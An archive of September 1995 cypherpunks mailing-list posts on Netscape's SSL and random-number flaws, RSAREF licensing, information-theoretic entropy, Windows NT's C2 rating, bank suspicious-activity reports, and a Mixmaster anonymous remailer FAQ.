Poughkeepsie, New York  12601
(914) 454-8130
E-Mail: lharrison@mhv.net

"Say not, 'I have found the truth', but rather, 'I have found a truth.'"
                         - Kahlil Gibran from "The Prophet"
********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Mon, 25 Sep 95 15:46:44 PDT
To: cypherpunks@toad.com
Subject: Re: SSL Man-in-the-middle
In-Reply-To: <199509251247.IAA27297@gatekeeper.itribe.net>
Message-ID: <447bes$7ai@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.SOL.3.91.950925124443.359B-100000@chivalry>, ses@tipper.oit.unc.edu (Simon Spero) writes:
> Exactly - the trust model used in Navigator 1.1N requires you to trust 
> every single owner of a valid certificate. Getting hold of any key is 
> vastly easier than having to obtain a specific key; in the worst case, 
> you just buy your own - SSL exchanges are repudiable, and a few simple 
> tricks can make sure you cerificiate doesn't show up in the "Document 
> Information" dialog box.

  Can you explain to me how you would get the Navigator to accept your
certificate, but not display anything in the "Document Information"
dialog?

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 26 Sep 95 06:16:16 PDT
To: cypherpunks@toad.com
Subject: Re: Golden Coy Freeh
Message-ID: <199509260246.WAA20098@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.SUN.3.91.950925144659.21198A-100000@nic.cerf.net>,
paulp@CERF.NET (Paul Phillips) wrote:

>On Mon, 25 Sep 1995, John Young wrote:
[...]
>>    If the head of the F.B.I. acknowledged that his agency was
>>    powerless to crack a cryptography program like Pretty Good
>>    Privacy, the stampede for that software on the Internet
>>    would make the run on Windows 95 look puny.
>
>That's a bizarre and naive statement.  Is there anyone that thinks the 
>spread of strong crypto has been less than rapid only because people are 
>afraid it won't protect them against the government? Um, sorry, no.

The general public doesn't use PGP. If the FBI director admitted that
using PGP is safe even against the FBI, the general public just might
become aware of it. Perhaps the statement isn't so naive after all.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGdpbioZzwIn1bdtAQG5zwGAmmSuPLdrDV9rBAUmJFuywUC4x1KgeVqP
HiD9C8pP+L5xkZw8pyH8xhwfKPZeKOHb
=w1IS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 26 Sep 95 06:10:53 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape "random" number seed generator code available
Message-ID: <199509260259.WAA20138@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199509251159.EAA08528@mycroft.rand.org>, jim@acm.org (Jim
Gillogly) wrote:


>I'm nervous enough about all the Easter Eggs that have been reported in
>Netscape, like the secret keystroke shortcut to get to Fishcam, or the
>different behavior it exhibits when it finds a certain obscurely-named
>directory at the top level. 

Would you please elaborate?

TIA,

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGdsfSoZzwIn1bdtAQG3ZwGAk5ZFceYsUmo9OgQJ9oVZGcNcXnorr9a2
cLP/xy3vB/COr3uKjfr0mcYY6JMMLxfa
=nXHi
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 26 Sep 95 06:11:23 PDT
To: cypherpunks@toad.com
Subject: Re: Security Update news release
Message-ID: <199509260306.XAA20157@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9509251617.ZM167@tofuhut>, jsw@netscape.com ("Jeff Weinstein")
wrote:

>--
>--PART-BOUNDARY=.19509251617.ZM167.tofuhut
>Content-Type: text/plain; charset=us-ascii
>
>  Here is the press release we put out this morning regarding the fix
>for RNG seed and stack overflow problems.

Do the new versions use PGP's randseed.bin? If Netscape even only looks at
data used to keep PGP secure,  Netscape will be banned from my computer
and every computer I am responsible for. -- For good.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMGduUCoZzwIn1bdtAQFEgwGA3265JY1cahyqqd2VEe+1RPXI96DQBPRV
r1EWdjxzjgXvxplLMagh9yWOPBq9OKRX
=F3qb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Allen <ChristopherA@consensus.com>
Date: Tue, 26 Sep 95 06:00:33 PDT
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Please send me SSL problems...
Message-ID: <v0213050fac8d26c8eab1@[157.22.240.12]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:04 AM 9/20/95, Jeff Weinstein wrote:
>  I'd just like to let all cypherpunks know that I'm really interested in
>getting any feedback you might have about security problems with Netscape
>products.  I'm particularly interested in bugs in the our implementation
>of SSL, and problems in the protocol that are not addressed in SSL 3.0.
>
>  We have been collecting comments on SSL 3.0, and have started incorporating
>that feedback into our spec.  Please don't assume that our lack of response
>means that we are ignoring your comments.  Between Navigator 2.0 and
>things like the SSL challenge and the RNG fire drill, we just have not had
>the time to get a new rev of the spec out.  Hopefully soon...

As you may know, Jonathan, who is an active member this list, has already
written about Consensus' intention to continue to upgrade RSAREF. We'd like
to help make sure that RSAREF stays in sync with SSLREF as we upgrade it.
For instance, the next major release of RSAREF will be encrypting the
private key (which now has to be done outside of RSAREF.)

One area in particular we could use some feedback on from you:

Currently SSLREF makes 4 calls that are not in the published program
interface of RSAREF. These calls are DES_CBCInit, DES_CBCUpdate,
RSAPublicEncrypt, RSAPrivateEncrypt. With your license with RSA for RSAREF
you are allowed to go under the published interface by using the DES
routines only for securing the channel, and the RSA routines are limited to
endpoint authentication only.

From what I've heard, SSLREF 3.0 may go beyond those limits, requiring
SSLREF 3.0 developers only to use RSA's BSAFE rather than the less
expensive (or at least, no up-front fee) RSAREF.

What Consensus Development would like to do is extend the RSAREF API such
that RSA's concerns as regards direct access to those routines is taken
care of, and can be called by non-PEM/non-Mail applications such as SSLREF.
We need to extend the API for PGP, so ideally anything new we add to the
API should be general purpose as possible, yet also deal with RSA's issues.

BTW, to explain RSA's issues regarding the RSAREF API: Consensus is
contractually required to get prior approval before licensing RSAREF for
any program that goes underneath the published API. This allows RSA to make
sure that these routines are not used in patented ways that RSA does not
have rights to. In designing new API and getting them to sign off on the
new API allows us to offer licenses to anyone without getting RSA's prior
approval.

------------------------------------------------------------------------
..Christopher Allen                  Consensus Development Corporation..
..<ChristopherA@consensus.com>                 1563 Solano Avenue #355..
..                                             Berkeley, CA 94707-2116..
..<http://www.consensus.com/>             o510/559-1500  f510/559-1505..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 26 Sep 95 05:59:15 PDT
To: cypherpunks@toad.com
Subject: RE: More on "Entropy"
Message-ID: <ac8cea100102100494bb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:29 PM 9/25/95, David Van Wie wrote:
>David Van Wie wrote:
>
>>>The entropy E is defined by the sum across n states of -P_i log_2(P_i),
>
>Timothy C. May wrote:
>
>>Hah! Another physicist converted to the information-theoretic view of
>entropy!
>
>Indeed.  I was able to track down the literature, and it is most
>interesting.  I am still a little bit skeptical of the "superset including
>thermodynamic entropy" school of thought, but I haven't finished reading all
>of the materials yet!  Clearly, the IT "version" of entropy is a well
>defined and useful thing....

Well, the more you adapt to the information theory point of view, the more
the Shannon-Kolmogoroff-Chaitin definitions become the natural ones, then
the more the whole "thermodynamic" definition of entropy will seem the odd
one.

One is left with the conclusion that Gibbs-style entropy has _something_
fundamental to do with information theory, and can then consider what those
relationships may be.

But, perforce, one is left with the most basic interpretation of
algorithmic complexity: the complexity of a system is related to the length
of the algorithm describing it. A "random" system is one which has no
shorter algorithmic description than itself.

(The connection of this statement to IQ test questions about describing a
sequence is left as an IQ test question for the reader.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 26 Sep 95 06:10:22 PDT
To: cypherpunks@toad.com
Subject: Hack Microsoft?
Message-ID: <199509260404.AAA14297@clark.net>
MIME-Version: 1.0
Content-Type: text/plain




   Microsoft recently got C2-security status approved for Windows NT by
the National Computer Security Center, a division of the NSA. They
are supposed to put systems through "laborious testing and review" before
they approve C2. So, if one can find bugs in NT's security, one can
toss a little more egg on the NSA's face and the sham that part of
their activies to *help* to secure american computers. A simple
violation of NT's C2 status would be to demostrate a flaw in it's
memory protection implementation. Personally, I think NT is
*riddled* with bugs waiting to be discovered. Hell, even the
NT "service pack" is included in the C2 status, which I bet
has plenty of holes.

  If Cypherpunks can find flaws that the NSA can't, or won't divulge,
what does that say about their so-called COMSEC ability.

-Ray



 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 26 Sep 95 05:58:03 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <9509220814.AA06967@cs.umass.edu>
Message-ID: <199509260411.AAA00090@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


I gather the Wall Street Journal is subscribed to 'punks -- seeing as
how I hear they were discussing the overflow bug today.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Tue, 26 Sep 95 05:30:22 PDT
To: goedel@tezcat.com (Dietrich J. Kappe)
Subject: Re: Cypherpunks Press release
In-Reply-To: <v01510106ac85ee814baa@[206.1.161.4]>
Message-ID: <m0sxTvi-001BjLC@passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


> -----BEGIN PGP SIGNED MESSAGE-----
> 
> We've seen the word "hacker" kicked around rather arbitrarily in the press.
> Are we to conclude that the cypherpunks are a bunch of hackers? I think its

Heh.  Seems so.

> time for some cypherpunks spin. How about a logo *and* a press release? The
> press release would give contacts (email, phone, etc.) so that someone on
> this list would be contacted by journalists when a crypto story breaks.

Damn fine idea, but how do a bunch of (p)anarchists choose a mouthpiece ?
Should we assign someone to be 'our' lawyer ?
 
I'd volunteer to be 'spokespunk', I've certainly been interviewed for TV and
print enough, and know how to handle and present myself to the press, but if
this is considered an 'honor' rather than a 'pain in the ass and potential
legal lightning rod' then I'd like to suggest someone with a longer pedigree
who has been writing more code lately take it on.  Tim ?

> If we get enough volunteers, we can fax blanket every newspaper, station,
> and network in the world.

Sure.

-- 
Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the net
mailto:craig@hubley.com     416-778-6136    416-778-1965 FAX
Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Tue, 26 Sep 95 05:29:18 PDT
To: perry@piermont.com
Subject: Re: cypherpunks press releases/contact list: YES!! DO IT!!
In-Reply-To: <199509202015.QAA05462@frankenstein.piermont.com>
Message-ID: <m0sxU3V-001BjIC@passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


> "Vladimir Z. Nuri" writes:
> > I'm going to argue against TCM and others who are opposed to a 
> > "cypherpunk press release" because this is not an "organized group".
> 
> Look, L. (may I call you L.?) --
> 
> we've gone over this many times. We aren't a group. We're a mailing
> list. We've got a diversity of opinions, and we have no organization
> -- nor do we want one.

True enough, but there are sometimes rough consenses on technical questions,
and if it were clear enough that these were collective in nature and not to
be ascribed to any particular person, e.g.:

"Consensus on cypherpunks seems to be that 40 bit encryption is not viable
 for commercial applications, and that Netscape seems to have taken less
 than due care to choose an appropriate random seed for its session keys."

-- 
Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the net
mailto:craig@hubley.com     416-778-6136    416-778-1965 FAX
Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@obscura.com>
Date: Tue, 26 Sep 95 05:06:50 PDT
To: c2.org.mix-l@jpunix.com
Subject: Mixmaster Remailer FAQ
Message-ID: <199509261140.EAA01736@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain



Frequently Asked Questions about Mixmaster Remailers
[FAQ Verson 1.5 Sept 22 1995]

                     by
               Lance Cottrell

This document is a semi-technical discussion of Mixmaster remailers.
I wrote this to answer questions often asked by new users of Mixmaster,
and to explain why you would want to use Mixmaster remailers.
At the end of this FAQ is a list of currently active Mixmaster remailers.


What is the most recent version of Mixmaster?
  I am pleased to announce the release of Mixmaster 2.0.2
  It contains many bug fixes. It also provides random remailer
  chaining.

What is Mixmaster?

Mixmaster is a new class of anonymous remailers. Inspired by the existing
"cypherpunk" remailers and discussions on the Cypherpunk mailing list
<cypherpunks@toad.com>, Mixmaster is the next generation in the evolution
of remailer technology.


What is an anonymous remailer?

   Quoting from Andre Bacard's remailer FAQ:
        An anonymous remailer (also called an "anonymous server")
        is a free computer service that privatizes your e-mail.
        A remailer allows you to send electronic mail to a Usenet
        news group or to a person without the recipient knowing
        your name or your e-mail address.
   For a non-technical introduction to remailers (not including Mixmaster),

   I recommend Andre's FAQ. It is posted regularly to:
        alt.privacy,alt.privacy.anon-server,alt.anonymous
   or you can get it by sending mail to:
        To: abacard@well.com
        Subject: Help1
        Message: [Ignored]


What do I need to use Mixmaster remailers?

   Unlike other remailers, you can't just make your own message and send it
   to the remailer. Mixmaster's security comes in part from using a special
   message format. The disadvantage of this is that you need a special 
   program to make the message for you. Once you have that program 
   (the client) remailing is as easy as running the program, and telling it
   which remailers you want to use.


How do I get the Mixmaster client software?

   There are two sites for distribution. The first is my machine:
   http://obscura.com/~loki/Welcome.html/
   or ftp to obscura.com and read /pub/remail/README.no-export

   The other is by anonymous ftp to jpunix.com

   You will have to follow the instructions there to get Mixmaster.
   Because Mixmaster contains cryptography, it may not be exported 
   from the U.S and Canada. The reason for the circuitous route to download
   Mixmaster is to show my good faith efforts to keep Mixmaster from being
   exported. I have heard rumors that someone has already broken this law,
   and that Mixmaster is available from Europe. I do not approve of this
   and will not support that site.


How do I get the software to run a Mixmaster remailer?

   The remailer software is available from the same sites as the client.


But I only see one Mixmaster distribution?

   The same program is used for both the client and the remailer. The only
   difference is in the installation. For the client you just compile it
   and you are ready to go. For the remailer, you need to set up mail
   forwarding and cron jobs.


What kinds of computers does Mixmaster run on?

   Unfortunately, not PCs or Macs. But it is being ported to those right now.
   Mixmaster runs under UNIX. The only machine it is known not to work on
   is Dec Alpha. It has been tested on Linux, FreeBSD, SunOS 4.1.3,
   Solaris, and several others. It has been compiled and tested on Netcom. 
   If you use it on a machine or service not on this list, please let me 
   know so I can add it.


How does Mixmaster work, and why should I use it?

   You should use Mixmaster if you want the highest level of anonymity
   available, or if your are tired of building remailer messages your self.
   A discussion of how Mixmaster provides this level of security is beyond
   the scope of this FAQ, but I put an essay on the subject on my home page
   <http://obscura.com/~loki/remailer-essay.html>


Does Mixmaster use PGP?

   No, Mixmaster uses the rsaref package from RSA. Mixmaster uses its own
   keys and key file formats. To add a key to a key ring, simply append 
   the key to your key file using your favorite text editor.


When Was Mixmaster Released?

   Mixmaster was originally released on an experimental basis in late
   1994. There were only ever two remailers running Mixmaster 1.0.
   Mixmaster 2.0 was released on May 3, 1995. There are now 18 publicly
   available Mixmaster remailers.

What is the latest version of Mixmaster?

   Version 2.0.2 was released on Sept 22, 1995. Mixmaster remailers can
   now accept messages containing multiple Mixmaster packets. Mixmaster
   can be told to choose a random set of remailers to chain your message
   through. It will now route multiple packet messages over independant
   chains. Several minor bugs were fixed.

   Version 2.0.1 was released on May 27, 1995. The only changes from 2.0
   are some improvements in the documentation, and the inclusion of a 
   more up to date list of remailers.


What remailers run Mixmaster?

   The most recent list of remailers is available on my homepage, along
   with the remailer list and key file for Mixmaster. You can simply
   replace your old files with the ones from my site to keep up to date.
   These files are in ftp://obscura.com/pub/no-export/
   They are also available by ftp.


   Here is the current list of Mixmaster remailers. Send mail to the
   remailer with the subject remailer-key to retrieve the remailers
   Mixmaster key.

   mix         mixmaster@obscura.com
   vishnu      mixmaster@vishnu.alias.net
   crown       mixmaster@kether.alias.net
   knight      mixmaster@aldebaran.armory.com
   robomix     robo@c2.org
   hroller     hroller@c2.org
   syrinx      syrinx@c2.org
   replay      remailer@replay.com
   hacktic     remailer@utopia.hacktic.nl
   crynwr      remailer@crynwr.com
   spook       remailer@spook.alias.net
   flame       remailer@flame.alias.net
   gondolin    mixmaster@gondolin.org
   q           q@c2.org
   Armadillo   remailer@armadillo.com
   precipice   mixmaster@mix.precipice.com
   anon        mixmaster@anon.alias.net
   secrets     secret@secret.alias.net



Since this is a new FAQ, I am sure it is far from comprehensive. Watch
this space for changes to the FAQ. It will be evolving rapidly for a
while. Please send any questions you think should be here to:

loki@obscura.com

My outpost on the WWW is <http://obscura.com/~loki/Welcome.html>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 26 Sep 95 05:02:10 PDT
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <9509252047.AA01994@hplyot.obspm.fr>
Message-ID: <Pine.SUN.3.91.950926055621.9486A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Sep 1995, Laurent Demailly wrote:

> 
> It's not an exploit script, but you can find an auto crash "animation"
> for Ray's discovered bug on 
>   http://hplyot.obspm.fr/~dl/netscapesec/c1.html
> (or click from the updated http://hplyot.obspm.fr/~dl/netscapesec/)

Crashes the 16-bit Windows version 1.1N.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hugh@ecotone.toad.com (Hugh Daniel)
Date: Tue, 26 Sep 95 06:10:41 PDT
To: cypherpunks@toad.com
Subject: ADMIN:  Sudden CP Vacation, rest up while you can...
Message-ID: <9509261309.AA04686@ecotone.toad.com>
MIME-Version: 1.0
Content-Type: text/plain


  Toad.com (the cypherpunks host machine provided by John Gilmore) was
down today for about 12 hours due to disk/netnews problems, and not
the NSA or little green men (is there a difference...? :r)

		||ugh Daniel
		Majordomo Potty Trainer
		Owner-Cypherpunks@toad.com
		hugh@toad.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 26 Sep 95 05:03:03 PDT
To: cypherpunks@toad.com
Subject: NYT on Nscp Flaw 3
Message-ID: <199509261017.GAA08915@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, September 26, 1995, p. D19.


   Hackers Alert Netscape to Another Flaw

   By Bloomberg Business News


   Mountain View, Calif., Sept. 25 -- The Netscape
   Communications Corporation said today that a third flaw had
   been discovered in its Internet access software by a group
   of computer hackers who call themselves the Cypherpunks.

   The hackers -- computer users and mathematicians who try to
   discover weaknesses in computer software and networks --
   found a design flaw that can shut down Netscape's Navigator
   browser software, which helps people travel on the
   Internet.

   Two American college students last week broke Netscape's
   software security code, a design flaw that could jeopardize
   financial transactions done using Navigator. A month
   earlier, a French hacker broke a different Netscape
   security code.

   "We are learning a lot from these problems," said Michael
   J. Homer, vice president of marketing at Netscape. Shares
   of the company, which sold its first stock to the public
   last month, rose $4.25 today to close at $67 in Nasdaq
   trading.

   The latest flaw found by the hacker group is a programming
   error in Netscape software used to navigate the World Wide
   Web, a part of the Internet made up of photos, sounds and
   drawings.

   End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Tue, 26 Sep 95 05:01:08 PDT
To: cypherpunks@toad.com
Subject: Suspicious Action Reports
Message-ID: <Pine.SOL.3.91.950926063218.24647B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
[...]

And as for FinCEN, it has recently become the repository for the new SAR's
(Suspcious action reports) to be filed by all banking entities and replacing
the multiple paperwork forms and sites, as stated in the Federal Register.

One thing I noted was the expansion of surveillance responsibility for
banks and other financial transaction organizations.  And whether new or not,
I experienced horror upon reading that financial institutions are supposed
to file a SAR for any suspicious activity, as perceived by the bank, and
is prohibited from disclosing the fact of the SAR to the subject and required
to make financial transaction records, which must be retained for ten years,
available to law enforcement "upon request" - a description which is lacking
a search warrant.

The regulations in the FR, identical for all institutions, actually discussed
bankers and related organizations as entering into "partnerships" with the
federal gestapo in naming names.

Names, that is, of people and monetary transactions that bank and other
financial facilities find "suspicious" - a subjective assessment based on
whatever criteria happen to be in the minds of employees.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Tue, 26 Sep 95 07:28:55 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Hack Microsoft?
Message-ID: <v02110101ac8db6a370eb@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


Ray scribes:

>   Microsoft recently got C2-security status approved for Windows NT by
>the National Computer Security Center, a division of the NSA. They
>are supposed to put systems through "laborious testing and review" before
>they approve C2.

Not so laborious, the brunt of C1 and C2 testing is accomplished by a test
suites that do topical levels only. The issue is that there is a NCSC
engineer watching it happen. Hence if oit passes it is "blessed".

As per the orange book itself, C2 is about the lowest level of "Secure"
that you can get. In fact if Microsoft had gone to the trouble of a B1 or
B2 rating this would have been impressive but since most systems analysts
have not been familiarized with the levels of system accounting and access
control/logging that represents the various levels of "Orange Book" Rating
it is somewhat superfluous.

>So, if one can find bugs in NT's security, one can
>toss a little more egg on the NSA's face and the sham that part of
>their activies to *help* to secure american computers. A simple
>violation of NT's C2 status would be to demostrate a flaw in it's
>memory protection implementation.



>Personally, I think NT is
>*riddled* with bugs waiting to be discovered. Hell, even the
>NT "service pack" is included in the C2 status, which I bet
>has plenty of holes.

No Doubt;  NT should be easily hacked in the upcomming months by any number
of mortals let alone the gods themselves. What UNIX has that NT doesn't
(which makes it more vuknerable to attack) is 20 more years of evolution,
More copies, everybody knows it (at least in our group)...

As per NT's orange book C2 Rating... C2 is about the lowest level of Secure
that you can get. In fact I personally am unimpressed, rather it is a box
on an RFQ that gets checked Very few people run C anything sites in
reality. If Microsoft had gone to the trouble of a B1 or B2 rating this
would have been cool but since most system's analysts have not been
familiarized with the levels of system accounting and access
control/logging that represents the various levels of "Orange Book" Rating
it is somewhat superfluous.

This is especially true since the Folks at the FRB and FDIC/FSLIC
orgaizations are more likely to require B2 or the like on the National
Standards for "blessed" commerce Engines (I wonder what the FSTC has to say
about this?). Seems to me like the "Evil Empire" is just puffing it's chest
for a very very small market...

IMHO - Military sites passing real classified data usually are not run on
anything as low as C2. If you want a secure os, look at the Harris Computer
Corp's B1-Certified version of ES/MP UNIX (they call it CX/SX). FOUO - For
Official Use Only sites often run C1/C2 based OS's for Audit training but
are usually not part of the Trusted Computing Base and as such not real
threats. Still the most common problem is human not the OS. Not the actual
OS itself,.

>
>  If Cypherpunks can find flaws that the NSA can't, or won't divulge,
>what does that say about their so-called COMSEC ability.


Not necessarily on the NSA, you have to start somewhere and they do a good
job as far as NIST and NCSC efforts are concerned. If you can do better
then you have a good career in commercial cracking or will have lots of
time on your hands (Federal Food is the Pits, and the golf course is gone
from Lompoc!).

>
>-Ray
>
>
>
>

Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com


-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a
XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0
0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y
=bTYb
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David R. Conrad" <drc@russell.moore.com>
Date: Tue, 26 Sep 95 04:57:51 PDT
To: cypherpunks@toad.com
Subject: Re: New Netscape RNG
In-Reply-To: <199509250649.CAA27099@clark.net>
Message-ID: <Pine.LNX.3.91.950926072411.866D-100000@russell.moore.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Sep 1995, Ray Cromwell wrote:

>   I just glanced at the new Netscape RNG source. I don't really see
> anything bad, but I haven't analyzed it. However, I'm curious
> as to why variables like the username or the language locality
> are used as sources of entropy. These seem to provide almost nil.

I, too, have only skimmed the code briefly.

[Lots of good stuff deleted]

>   Using those sources probably can't hurt, they just seemed
> like odd choices, "grasping for straws" so to speak.

What isn't clear to me is how much entropy they are assigning to these
sources.  Certainly if they manage to get at least 128 bits of entropy
then it doesn't matter how many non-random bits they mix into the hash.

I think they are simply throwing everything but the kitchen sink in,
and assuming that the overall result will be a sufficient number of
bits of entropy.  But it would be nice to at least see a few comments
on how many bits they expect each individual source to provide.

I also noticed that they use $HOME/.pgp/randseed.bin under unix, but
they don't bother with %PGPPATH%\RANDSEED.BIN on PCs.  I've sent Jeff
a private message about this.

David R. Conrad, conrad@detroit.freenet.org, http://www.grfn.org/~conrad
Hardware & Software Committee  --  Finger conrad@grfn.org for public key
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Tue, 26 Sep 95 06:17:53 PDT
To: cypherpunks@toad.com
Subject: Re: RSA/Cylink arbitration agreement on-line
Message-ID: <v02130503ac8dbea888ef@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:13 AM 9/25/95, Brian A. LaMacchia wrote:
>[I haven't seen this mentioned yet on the list...]
>
>Cylink has been kind enough to put a copy of the arbitration panel's
>decision on their web page.  Cylink's home page is www.cylink.com.  The
>URL for the actual agreement is:
>
>        http://www.cylink.com/arbtrn_1.html
>
>Spin doctors aside, it doesn't look like either company gained much over
>the other.  I'm not an attorney, but the way I read the agreement RSAREF
>can continue to be used without violating the Stanford patents.  RSA DSI
>cannot *sublicense* the Stanford patents to third parties, but can *sell
>code* that practices the methods claimed in the Stanford patents.  That
>code can then be incorporated into other products, which is exactly what
>PGP 2.6.2 does (it's linked against a copy of the RSAREF library, which
>is covered by the RSAREF license agreement).
>

As far as I can tell, that seems to sum it up. In addition, RSA agrees
in all their contracts to indemnify the licensee regarding RSA's rights to
assign the various technologies. When I called to speak to them, they
reiterated their stance. Since, we are going to be handling RSAREF, the
validity of RSAREF licenses was of some importance. Having gone through
the arbitration ruling things seem to be on track.

I'll post more of this to the RSAREF Announce list for folk.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page  ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 26 Sep 95 04:57:33 PDT
To: cypherpunks@toad.com
Subject: The Law of ElectronicCommerce:  EDI, E-mail and Internet
Message-ID: <v02120d01ac8d9186262d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Mon, 25 Sep 1995 20:49:03 -0700
From: Davidwfox@eworld.com
To: www-buyinfo@allegra.att.com, e-payment@bellcore.com
Subject: The Law of ElectronicCommerce:  EDI, E-mail and Internet

FYI...

Little Brown and Co. announces release of _The Law of Electronic
Commerce:  EDI, E-mail and Internet_ (Second Edition) by Benjamin
Wright.
This 640 page book has been updated to cover the latest
developments in electronic commerce, including the Utah Digital
Signature Act, electronic cash, computer records, and Internet
commerce.
For more information, contact Little, Brown at tel:
800-331-1664; tel: +1-617-890-0250; fax: +1-617-890-0875.
The summary table of contents is available on the world wide web at
http://infohaus.com/access/by-seller/Benjamin_Wright

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
